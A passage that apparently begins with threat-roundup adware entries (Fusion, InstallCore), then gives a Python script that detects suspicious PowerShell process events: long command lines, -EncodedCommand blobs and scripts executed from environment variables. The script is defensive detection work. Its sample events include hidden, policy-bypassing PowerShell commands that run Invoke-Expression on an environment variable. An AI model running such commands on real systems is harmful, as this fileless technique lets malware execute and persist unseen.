                  Fusion (or FusionPlayer) is an adware family that displays unwanted advertising in the form of pop-ups or by injecting into browsers and altering advertisements on web pages. Adware is known to sometimes download and install malware.
                • Installcore adware detected (32)
                  InstallCore is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of pop-ups or by injecting into browsers and adding or altering advertisements on web pages. Adware is known to sometimes download and install malware.
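The two PowerShell entries above describe what the telemetry is keying on: command lines far longer than an administrator would type, and a script body pulled out of an environment variable at run time so that nothing has to land on disk. The Python below is an added example, not Talos code and not the AMP logic, that applies both checks to process-creation events and also decodes -EncodedCommand, so the environment-variable pattern is still caught when it is hidden inside the base64 blob. The events, the variable name kcwpz and the 1000-character threshold are constructed or assumed for the example; baseline your own fleet before turning the threshold into a rule.

```python
import base64
import binascii
import re

# Illustrative threshold (an assumption for this example, not a vendor value).
LONG_CMDLINE_THRESHOLD = 1000

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}

# Two shapes of "run whatever is in an environment variable":
#   iex $env:name   /  Invoke-Expression ([Environment]::GetEnvironmentVariable(...))
#   $env:name | iex /  (gc env:name) | Invoke-Expression
ENV_EXEC_PATTERNS = (
    re.compile(r"(?i)\b(?:iex|invoke-expression)\b[^;|\n]*(?:\$env:|\benv:|GetEnvironmentVariable)"),
    re.compile(r"(?i)(?:\$env:\w+|\benv:\w+|GetEnvironmentVariable\([^)]*\))[^;\n]*\|\s*(?:iex|invoke-expression)\b"),
)

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_ARG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})")


def image_name(path):
    """Basename of an image path, lower-cased, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def encode_command(script):
    """Produce what PowerShell expects after -EncodedCommand: base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the script hidden behind -EncodedCommand, or None if there is none."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def env_var_execution(text):
    return any(p.search(text) for p in ENV_EXEC_PATTERNS)


def analyze_event(event):
    """Return the list of reasons an event is suspicious (empty if none)."""
    reasons = []
    if image_name(event["image"]) not in POWERSHELL_IMAGES:
        return reasons
    cmd = event["cmdline"]
    if len(cmd) > LONG_CMDLINE_THRESHOLD:
        reasons.append("excessively long PowerShell command line")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded command")
    # Check the raw command line and the decoded script, so "iex $env:x" is
    # caught even when it only appears inside the -EncodedCommand payload.
    if env_var_execution(cmd) or (decoded is not None and env_var_execution(decoded)):
        reasons.append("script body pulled from an environment variable")
    return reasons


def analyze(events):
    """Map pid -> reasons for every event that trips at least one check."""
    findings = {}
    for event in events:
        reasons = analyze_event(event)
        if reasons:
            findings[event["pid"]] = reasons
    return findings


# Constructed process-creation events (not real telemetry). The variable name
# "kcwpz" is an invented stand-in for the random names this technique uses.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"pid": 1001, "image": PS,
     "cmdline": "powershell.exe -NoProfile -Command Get-Service -Name Spooler"},
    {"pid": 1002, "image": PS,
     "cmdline": 'powershell.exe -w hidden -ep bypass -c "iex $env:kcwpz"'},
    {"pid": 1003, "image": PS,
     "cmdline": "powershell.exe -NoP -NonI -W Hidden -Enc " + encode_command(
         "$pad='" + "A" * 900 + "';"
         "iex ([Environment]::GetEnvironmentVariable('kcwpz','User'))")},
    {"pid": 1004, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'cmd.exe /c "iex $env:kcwpz"'},
]

if __name__ == "__main__":
    for pid, reasons in analyze(SAMPLE_EVENTS).items():
        print(pid, "->", "; ".join(reasons))
```

Event 1004 is left alone on purpose: the checks are scoped to the PowerShell images, so a cmd.exe wrapper that later spawns PowerShell will be caught on the child event rather than the parent. In production you would also want to tie the environment-variable hit back to the registry autorun that sets the variable, which is where Kovter and Poweliks actually persist.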